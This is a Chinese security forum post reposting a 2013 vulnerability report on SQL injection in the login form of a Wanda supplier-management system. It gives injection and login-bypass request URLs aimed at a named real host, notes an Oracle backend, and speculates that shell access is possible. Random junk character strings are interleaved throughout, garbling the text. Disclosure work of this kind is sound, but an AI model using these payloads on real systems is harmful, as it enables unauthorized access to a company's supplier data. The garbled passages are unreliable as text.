找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2646|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
  o. f! T6 }2 T" ~# e( F详细说明:( g0 @& O* T0 X7 }+ p. |' \! ?
万达scm系统登陆框sql注入。/ b  ]  P* N" a  a, v; B
# `7 L: p  o5 I' U( f5 d
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
& q* k' B7 }' M$ B/ I. w6 ~% ?1 y/ T+ h8 c1 S

+ E  ]0 h* |7 `500错误。; C4 c) G' q; d6 R) S! {
* E; O+ C) |4 a6 h" @
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
- b% J7 @9 h9 M. {) bhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png, _" _) ^+ B& s7 X1 y
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)" ~2 n$ ~1 g# p1 T5 c
经过分析,登陆验证的过程应该是:/ o0 c) C5 C8 R8 P
# S0 E( _; Q% D) J' Z
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
# n1 d' l6 w/ G6 l7 D' Ihttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
# w, q9 `" |! g# J
5 M* j* q! M; J" ^8 noracle数据库,存在注入点。@大连万达,你怎么看?
! k0 X+ Z" ~* T0 h2 Xhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png8 w/ b8 G3 L" o/ o3 N' c

/ g/ T" A7 R# s5 v. Q系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。# t7 r: o# a8 J& p  \* A& w( C* x4 @
漏洞证明:
. i1 n' A9 Y2 a& w$ t; O万达scm系统登陆框sql注入。( K, H: J  D' D8 D0 ]2 @4 z
7 [1 F5 E4 A' `% m
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27& M, f$ O) j4 o9 F! o* ~" k

7 }) K. t4 ]# j8 z7 b0 Y! u
) r1 _! B/ |! ^/ I, N500错误。; U8 D1 g9 P4 [5 F) k

% @( t7 |* L* C% j6 k用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。! q, ?8 d& g, m
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png! N$ ]: S6 E- T  U0 n& z

! @" r( {2 B0 [* W; D; W( S2 N% |8 h% j; ~' `( X# S2 d$ l
(截图有一点问题)
+ V% L- f' ~" s. Y
5 Q+ X/ N0 T0 Q  B* A3 e; n8 u( Z怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
/ E9 D$ L9 U% c( Y5 u
& d5 R& O# I3 F' \- \9 o* _+ f4 y取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
9 F/ H+ y5 c7 p; ^- K  D3 \, B, E  Y$ Y% W4 j2 v  }5 M
绕过:, C& A+ {. r5 m
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
4 e2 U% ^2 y! v6 o% o" P' f! i
3 F- S, Z+ n5 h: J3 v5 Q  A7 ]) E! ?5 p5 I0 V$ \) j5 N2 b
oracle数据库,存在注入点。@大连万达,你怎么看?5 Q' j# t1 H: O2 N+ [
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
* a, x7 j# W$ e4 ]7 T1 `& Q) @/ t: j0 u0 Y7 Y0 i
修复方案:, B0 L; `/ r3 p9 ]  T% Q
。。。' f2 N; n4 _: M, N4 B) y% n) G6 ~1 c
. j5 y$ M8 u: w1 F
+ Y) ]2 {7 o" J+ n
厂商已经确认
8 l" ]* {1 s* h/ ~" r, A0 [; y6 I+ h' C- b' ~
[/td][/tr]
! t* q& O9 w$ T; q[/table]$ ]: J: Z% k3 T0 T  [
1 s2 z" E2 [3 Y$ E* M+ t8 y

/ |2 d& P5 [- X- C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表